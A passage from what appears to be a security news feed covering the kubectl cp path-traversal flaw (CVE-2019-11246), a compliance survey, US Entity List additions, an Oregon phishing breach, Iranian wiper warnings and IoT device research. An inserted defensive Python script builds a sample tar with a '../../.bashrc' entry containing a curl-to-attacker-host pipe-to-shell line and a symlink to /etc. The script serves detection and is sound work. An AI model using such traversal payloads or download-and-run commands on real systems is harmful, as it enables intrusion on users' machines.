To determine whether you are vulnerable, Smith said to run kubectl version --client. Any versions other than client version 1.12.9, 1.13.6 or 1.14.2 are vulnerable and should be updated.

“This vulnerability stems from incomplete fixes for a previously disclosed vulnerability (CVE-2019-1002101). This vulnerability is concerning because it would allow an attacker to overwrite sensitive file paths or add files that are malicious programs, which could then be leveraged to compromise significant portions of Kubernetes environments,” said Wei Lien Dang, co-founder and vice president of product at StackRox.

“This type of exploit shows how a client-side vulnerability could be used to potentially compromise production environments, especially since we have observed that best practices to mitigate against this type of threat vector are not always followed. For example, users may be running kubectl on production nodes or without appropriate role-based access control to limit access to the entire cluster or with elevated local system permissions.”
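As an added example (not kubectl's own code, and not taken from the advisory or from StackRox), the Python script below puts the two points above into working form: it parses the output of `kubectl version --client` against the fixed releases Smith named, and it applies the path-confinement check that the vulnerable `kubectl cp` lacked to a tar stream of the kind a hostile container could hand back, where member names such as `../../.bashrc` or a symlink pointing outside the destination would otherwise land on the user's workstation. The sample version string, the tar contents and the destination path are all constructed for illustration.

```python
"""Added example: triage helpers for CVE-2019-11246 (kubectl cp traversal).

Not kubectl's code. Two checks:
  1. is_vulnerable(): decide from `kubectl version --client` output whether
     the client predates the fixed releases (1.12.9, 1.13.6, 1.14.2).
  2. unsafe_members(): kubectl cp unpacks a tar stream produced inside the
     container; this confines every member (and link target) to the
     destination directory, which is the check the vulnerable client lacked.
"""
import io
import os
import re
import tarfile

# First fixed patch release on each supported line, per the advisory.
FIXED = {12: 9, 13: 6, 14: 2}

_GITVERSION = re.compile(r'GitVersion:"v?(\d+)\.(\d+)\.(\d+)')

# Constructed sample of `kubectl version --client` output (not a real capture).
SAMPLE_OUTPUT = (
    'Client Version: version.Info{Major:"1", Minor:"13", '
    'GitVersion:"v1.13.5", Platform:"linux/amd64"}'
)


def parse_client_version(output: str):
    """Return (major, minor, patch) parsed from kubectl's GitVersion field."""
    m = _GITVERSION.search(output)
    if not m:
        raise ValueError("no GitVersion field in kubectl output")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(output: str) -> bool:
    """True if the client is older than the first fixed release of its line."""
    major, minor, patch = parse_client_version(output)
    if major != 1:
        return False          # assumption: only 1.x clients are in scope
    if minor < 12:
        return True           # release lines with no fixed build at all
    if minor in FIXED:
        return patch < FIXED[minor]
    return False              # 1.15 and later ship with the fix ("or later")


def unsafe_members(tar_bytes: bytes, dest: str):
    """Names of tar members that would write or link outside dest.

    Every member name and link target is resolved relative to dest and
    rejected unless it stays under dest; a client that extracts without this
    check lets the container choose arbitrary paths on the workstation.
    """
    dest = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        for member in tf.getmembers():
            target = os.path.realpath(os.path.join(dest, member.name))
            if os.path.commonpath([dest, target]) != dest:
                bad.append(member.name)       # e.g. "../../.bashrc"
                continue
            if member.issym():
                base = os.path.dirname(target)   # symlinks resolve from their own dir
            elif member.islnk():
                base = dest                      # hard links are archive-relative
            else:
                continue
            link_target = os.path.realpath(os.path.join(base, member.linkname))
            if os.path.commonpath([dest, link_target]) != dest:
                bad.append(member.name)       # link pointing out of dest
    return bad


def build_hostile_tar() -> bytes:
    """Constructed sample of what a malicious container could return to kubectl cp."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in [
            ("report.txt", b"harmless\n"),
            ("../../.bashrc", b"curl http://attacker.invalid/x | sh\n"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
        link = tarfile.TarInfo("escape")      # symlink out of the destination
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tf.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    print("client vulnerable:", is_vulnerable(SAMPLE_OUTPUT))
    print("rejected members:", unsafe_members(build_hostile_tar(), "/tmp/kubectl-cp-dest"))
```

The version check deliberately treats anything before 1.12 as vulnerable rather than "not listed", since no fixed build exists on those lines; the tar check resolves paths with realpath on both sides so that a destination that is itself a symlink is compared consistently.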

Because upgrades depend on the actions of individual users, the fix can be harder to enforce, and Dang expects that this will not be the only vulnerability disclosed as a result of the security audit.

“These disclosures, along with the work by the Kubernetes product security team and broader community, will ensure that Kubernetes continues to be the most secure container orchestration platform.”

Categories: Cyber Risk News

Ethics and Compliance Programs Growing More Mature

Mon, 06/24/2019 - 16:13
Ethics and Compliance Programs Growing More Mature

Ethics and compliance programs are trending up, driven in large part by strong support from top executives, according to the 2019 Definitive Corporate Compliance Benchmark Report, published by NAVEX Global.

The research revealed that when leadership buys in to the strategic value of ethics and compliance programs, there is not only a greater likelihood of success but also an increased perception of organizational ethics. Strong executive backing also leads to greater program maturity and enables adoption of ethics and compliance technologies that improve program performance.

When asked whether the organization was "always ethical," only 25% of respondents with basic ethics and compliance programs said yes, and only 48% of all respondents noted that senior managers valued ethics and compliance as an important part of a comprehensive risk management strategy that has a proven return on investment.

The other 52% said that their programs were viewed primarily as an insurance policy or a necessary evil. While 85% of respondents reported using one or more automated solutions in their programs, organizations that use up to five of these solutions report increased ability to prevent violations.

In addition, 85% of respondents said a “centralized repository with easy access to the most current versions” was valuable or very valuable, and 78% rated “improved version control, reduced redundancy or increased accuracy of policies” equally as valuable, according to the report.

“It’s obvious to employees when leadership believes in the strategic value and measurable ROI of ethics and compliance programs. Leaders who view compliance programs as insurance policies or necessary evils – as many do, particularly within less-mature organizations – are sending the wrong message to their workforce,” said Carrie Penman, chief compliance officer and senior vice president, advisory services, NAVEX Global.

Additionally, 71% of respondents overall and 91% of those organizations with advanced programs offered an anonymous reporting channel, which is widely considered something every organization should have at this point.

Categories: Cyber Risk News

US Adds AMD Joint Venture to Entity List

Mon, 06/24/2019 - 10:40
US Adds AMD Joint Venture to Entity List

The US Department of Commerce has added five more Chinese organizations onto the same Entity List as Huawei over national security fears, including an AMD joint venture.

The department’s Bureau of Industry and Security (BIS) said the changes to the list, which will prevent US firms from doing business or selling components to them, will take effect from today.

That will be a headache especially for AMD, which set up a JV with Tianjin Haiguang Advanced Technology Investment Company (THATIC), aka Higon, back in 2016 to sell its x86 chips in China.

Two other companies on the list — Sugon and the Wuxi Jiangnan Institute of Computing Technology — build exascale supercomputers which the US government believes have military purposes. The latter is owned by the 56th Research Institute of the General Staff of the PLA, with a mission “to support China's military modernization,” according to the US government.

“Under § 744.11(b) (Criteria for revising the Entity List) of the EAR, entities for which there is reasonable cause to believe, based on specific and articulable facts, have been involved, are involved, or pose a significant risk of being or becoming involved in activities that are contrary to the national security or foreign policy interests of the United States, and those acting on behalf of such persons, may be added to the Entity List,” the notice said.

Sugon is said to be the majority owner of Higon, while the two remaining entities on the list are: Chengdu Haiguang Integrated Circuit (aka, Hygon and Chengdu Haiguang Jincheng Dianlu Sheji) and Chengdu Haiguang Microelectronics Technology (aka HMC and Chengdu Haiguang Wei Dianzi Jishu).

The new organizations join Huawei and ZTE on the list, which can be seen in the wider context of the Trump administration’s ramping up of pressure on the Chinese government over trade and national security.

Last week, the US Consumer Technology Association (CTA) complained that Trump’s much-derided tariffs would hit US consumers hardest, rather than the Chinese firms the US President wants to punish.

It claimed the average smartphone imported from China would increase in price by $70 (22%) if another proposed tariff of 25% on $300bn of Chinese goods is introduced.

“Tariffs are taxes, paid by American consumers —and these new tariffs would be a burden on American families just as they start back-to-school shopping,” said Gary Shapiro, CEO of the CTA.

“US consumers, not China, pay the price for tariffs — what more proof does the White House need? It’s time for this administration to put American small businesses, workers and families first and make a deal with China.”

Categories: Cyber Risk News

Phishing Attack Exposes PII on 645,000 Oregonians

Mon, 06/24/2019 - 09:45
Phishing Attack Exposes PII on 645,000 Oregonians

Over 600,000 Oregon residents have been told their personal information may have been compromised after a successful phishing campaign against employees of the state’s Department of Human Services (DHS).

The agency is sending 645,000 clients breach notices following a January 2019 incident, it said in a statement last week.

Nine DHS employees clicked through a phishing email sent early in the month, giving hackers access to their accounts.

“Beginning January 9, 2019, these nine employees started reporting problems. All affected accounts were located and access to the nine affected accounts was stopped by January 28, 2019,” it continued. “On January 28, 2019 the department and the Enterprise Security Office Cyber Security team confirmed that the phishing incident was a data breach.”

Although no additional malware was downloaded and no further accounts were compromised, investigators determined that the incident may have exposed as many as two million emails to the attackers.

“Most client information involved in the breach was in email attachments, like reports. The exposed client information includes first and last names, addresses, dates of birth, Social Security numbers, case numbers, personal health information, and other information used in DHS programs,” the DHS notice continued.

“The personal health information includes ‘Protected Health Information,’ or PHI, covered under the Health Insurance Portability and Accountability Act (HIPAA). Not all of these information types were exposed for each person.”

Although the DHS claimed to regularly patch systems, complete independent security assessments and even regularly train staff, the incident highlights the challenge of mitigating the phishing threat.

Verizon claimed in its most recent Data Breach Investigations Report (DBIR) that a third (32%) of breaches were linked to phishing attacks last year.

Categories: Cyber Risk News

US Warns of Destructive Iranian Cyber-Attacks

Mon, 06/24/2019 - 08:30
US Warns of Destructive Iranian Cyber-Attacks

A US government security agency has ratcheted up tension with Iran by warning that escalating state-sponsored attacks could turn destructive.

The Cybersecurity and Infrastructure Security Agency (CISA) director, Christopher Krebs, said in a statement dated Saturday that Iranian “regime actors and proxies” had ramped up malicious cyber-activity against US government agencies and industries of late.

“We will continue to work with our intelligence community and cybersecurity partners to monitor Iranian cyber activity, share information, and take steps to keep America and our allies safe,” he continued.

“Iranian regime actors and proxies are increasingly using destructive 'wiper' attacks, looking to do much more than just steal data and money. These efforts are often enabled through common tactics like spear phishing, password spraying, and credential stuffing. What might start as an account compromise, where you think you might just lose data, can quickly become a situation where you've lost your whole network.”

Iran has indeed been pegged for several destructive cyber-attacks over recent years, most notably the Shamoon attack of 2012 on Saudi state oil giant Saudi Aramco which is said to have wiped the hard drives of over 30,000 machines.

Tensions between the US and Iran have risen since Donald Trump tore up the previous administration’s nuclear deal with the Islamic Republic and imposed economic sanctions which have emboldened hardliners in Tehran.

After Iran shot down an unmanned US drone last week, a US military response was widely expected. A new report citing “two former intelligence officials” claimed that a retaliatory cyber-strike was launched on Thursday evening.

It targeted a cyber-espionage group linked to the Iranian Revolutionary Guard Corps, the report claimed.

“In times like these it's important to make sure you've shored up your basic defenses, like using multi-factor authentication, and if you suspect an incident — take it seriously and act quickly. You can find other tips and best practices for staying safe online here,” concluded Krebs.

Categories: Cyber Risk News

66% of Homes in North America Have Multiple IoT Devices

Fri, 06/21/2019 - 18:19
66% of Homes in North America Have Multiple IoT Devices

North American homes have the highest density of internet of things (IoT) devices of any region in the world, according to researchers at Stanford University and Avast.

Together, Stanford University and Avast have published findings of their research in a paper entitled All Things Considered, which analyzes the global state of IoT. The survey was based on “data collected from user-initiated network scans of 83M devices in 16M households,” the report said.

“Home IoT is better characterized by smart TVs, printers, game consoles, and surveillance devices – devices that have been connected to our home networks for more than a decade,” the report said.

“These are the kinds of devices that still support weak credentials for old protocols: work appliances are the device type with the highest fraction of weak FTP credentials; surveillance devices are the worst for telnet credentials. Improving the security posture of these devices remains just as important as ensuring that new technologies are secure – our home networks are only as secure as their weakest link.”

Notably, 66% of homes in North America possess at least one IoT device, 26 percentage points above the global average of 40%. Additionally, 25% of North American homes have more than two devices.

Although there are more than 14,000 IoT manufacturers worldwide, 94% of all IoT devices are made by as few as 100 vendors.

When looking at devices such as game consoles, there was little variance across the world in the most popular vendors, with Microsoft and Nintendo taking the top two spots. Open or weak FTP credentials were the top vulnerability. The research found that over 7% of all IoT devices still support FTP or telnet, legacy protocols that send credentials in cleartext, making them especially vulnerable.

“There already exists a complex ecosystem of Internet-connected embedded devices in homes worldwide, but these devices are different than the ones considered by most recent work,” the researchers wrote.

Categories: Cyber Risk News